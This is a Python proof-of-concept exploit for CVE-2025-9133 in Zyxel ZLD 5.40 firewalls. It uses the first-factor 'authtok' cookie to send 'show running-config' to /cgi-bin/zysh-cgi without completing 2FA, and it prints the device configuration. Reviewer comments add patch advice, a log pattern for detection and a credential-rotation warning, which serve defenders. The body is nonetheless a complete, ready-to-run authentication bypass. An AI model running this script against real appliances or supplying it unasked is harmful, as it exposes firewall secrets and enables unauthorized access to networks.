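# Date: 2025-08-14
# Exploit Title: ZYXEL ZLD 5.40 Missing Authorization
# Exploit Author: Alessandro Sgreccia (@rainpwn)
# Author Homepage: https://rainpwn.blog/
# Vendor Homepage: https://www.zyxel.com/
# Tested Version: ATP 5.40 (ABPS.0)
# Tested on: ATP 100
# CVE: CVE-2025-9133
#
# Example:
# 1. Launch this script to get running config as semi-authenticated user.
# > python3 main.py <host> <port> <username> <password>
#
# What the script shows: the primary login (username/password) of a
# 2FA-enabled account yields an "authtok" cookie, and the script sends that
# cookie to /cgi-bin/zysh-cgi without ever submitting the second factor.
# If the appliance answers with the running configuration, the CGI handler is
# not checking that 2FA was completed for the session.
#
# Reviewer notes for defenders:
# - Apply the vendor's fix for CVE-2025-9133; on a fixed device this script
#   is expected to end in "Something went wrong!".
# - In web/proxy logs, the pattern visible here is a GET to /weblogin.cgi
#   followed by a POST to /cgi-bin/zysh-cgi carrying "show running-config"
#   with no 2FA verification request in between.
# - The running configuration presumably contains secrets (hashes, keys,
#   VPN settings -- confirm for your model); treat a successful response as
#   credential exposure and rotate accordingly.

import requests
from requests import Session
from urllib3.exceptions import InsecureRequestWarning
import sys

# Suppress the warnings from urllib3.
# NOTE(review): every request below uses verify=False, so the peer's TLS
# certificate is never validated and the credentials are sent to whoever
# answers on that address.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Seconds before a connection/read is abandoned; without a timeout requests
# waits indefinitely on an unresponsive device.
REQUEST_TIMEOUT = 15

s = Session()

# Four positional arguments are required: host, port, username, password.
if len(sys.argv) < 5:
    print("python3 main.py <host> <port> <username> <password>")
    sys.exit(1)

USERNAME = sys.argv[3]
PASSWORD = sys.argv[4]
FW_URL = f"https://{sys.argv[1]}:{sys.argv[2]}"
WEBLOGIN_URL = "/weblogin.cgi"
ZYSH_CGI = "/cgi-bin/zysh-cgi"

# Primary login. The credentials travel in the query string (as in the
# original request), so they will show up in access logs along the path.
# Passing them through `params` URL-encodes characters such as '&' or '#'
# that would otherwise corrupt the query.
try:
    login = s.get(
        FW_URL + WEBLOGIN_URL,
        params={"username": USERNAME, "password": PASSWORD},
        verify=False,
        timeout=REQUEST_TIMEOUT,
    )
except requests.RequestException as err:
    print(f"Login request failed: {err}")
    sys.exit(1)

if "2FA" in login.text:
    print("2FA enabled, trying to get config..")

    # Session token issued after the first factor only.
    authtok = s.cookies.get("authtok")
    if authtok is None:
        print("No authtok cookie returned by the login request.")
        sys.exit(1)

    cookies = {
        'authtok': authtok,
    }

    # Browser-like headers captured from the web UI; the Referer is the 2FA
    # verification page, i.e. the point where the session is still waiting
    # for the second factor.
    headers = {
        'Accept': '*/*',
        'Accept-Language': 'it,it-IT;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
        'Cache-Control': 'no-cache',
        'Connection': 'keep-alive',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': f'{FW_URL}',
        'Pragma': 'no-cache',
        'Referer': f"{FW_URL}/ext-js/app/view/object/authmeth/twoFA/2FAVerify.html?nextpage=ext-js/index.html",
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0',
        'X-Requested-With': 'XMLHttpRequest',
        'sec-ch-ua': '"Not;A=Brand";v="99", "Microsoft Edge";v="139", "Chromium";v="139"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Windows"',
    }

    # Read-only CLI commands submitted through the web CGI.
    data = {
        'filter': 'js2',
        'cmd': [
            'show version;show running-config;'
        ],
        'write': '0',
    }

    try:
        response = requests.post(
            f'{FW_URL}{ZYSH_CGI}',
            cookies=cookies,
            headers=headers,
            data=data,
            verify=False,
            timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as err:
        print(f"Request to {ZYSH_CGI} failed: {err}")
        sys.exit(1)

    # "!" is used as the success marker -- presumably the separator lines of
    # the running-config output; confirm against a real response.
    if "!" in response.text:
        print(response.text)
    else:
        print("Something went wrong!")
else:
    # NOTE(review): this branch is also taken when the login succeeds but the
    # account has no 2FA configured, so the message can be misleading.
    print("Invalid credentials.")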